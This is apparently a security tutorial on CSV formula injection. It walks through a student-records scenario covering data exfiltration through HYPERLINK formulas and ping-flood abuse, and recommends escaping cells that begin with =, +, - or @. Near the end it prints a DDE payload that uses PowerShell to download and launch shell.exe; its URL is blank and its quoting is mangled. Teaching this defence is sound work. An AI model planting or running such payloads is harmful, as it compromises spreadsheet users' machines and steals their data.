Csv Injection
Last updated
Was this helpful?
Last updated
Was this helpful?
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libreoffice or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
When a spreadsheet program used to open a CSV, any cells starting with ‘=’ will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:
Hijacking the user’s computer by exploiting vulnerabilities in the spreadsheet software.
Hijacking the user’s computer by exploiting the user’s tendency to ignore security warnings in spreadsheets that they downloaded from their own website .
Exfiltrating contents from the spreadsheet, or other open spreadsheets.
Let us assume an attack scenario of Student Record Management system of a school. The application allows teacher to enter details of students in the school. The attacker get access to the application and want that all the teacher using the application to get compromised. So the attacker tries to perform CSV injection attack through the web application.
The attacker need to steal other student’s details. So the attacker uses the Hyperlink formula ad enter it while entering student details.
When the teacher export the CSV and click on the hyperlink then the sensitive data is sent to the attacker’s server.
Exported CSV file contains malicious payload in it.
The details of student is logged in the attackers web server.
We can make the system as a BOT which we can use for dos attacks. Through this we can make the victim system to send unlimited ping request to any target server. This might result in the target server been flooded with many request and ultimate down time in the server when many systems are affected through this CSV injection attack.
Malicious payload into the server which is saved in the database.
When the victim export the csv the payload is exported in the csv file and when victim opens the CSV file using MS excel below error is shown to the victim.
So the victim has downloaded the csv file from trusted resource so they click on “Yes”. Now the MS Excel runs the payload and start sending ping request to the target server.
The best way to mitigate against this type of attack is to make sure all users’ inputs are filtered so only expected characters are allowed. Ensure that no cells begin with any of the following characters:
Equals to (“=”)
Plus (“+”)
Minus (“-“)
At (“@”)
If it is necessary, however, to accept these characters, the application must encode any cell values that might otherwise be interpreted as formulae. This is accomplished by preceding cell values that begin with the characters: +, -, =, or @ with a single quote. This is termed “escaping” or “neutralizing” the characters, and it will ensure that such cell values are interpreted as data and not as a formulas.
So we can take this attack further more. We can install shell in the system using below payload:=cmd|’ /C powershell Invoke-WebRequest “ -OutFile “$env:Temp\shell.exe”; Start-Process “$env:Temp\shell.exe”‘!A1Using this shell we can perform many further attacks.
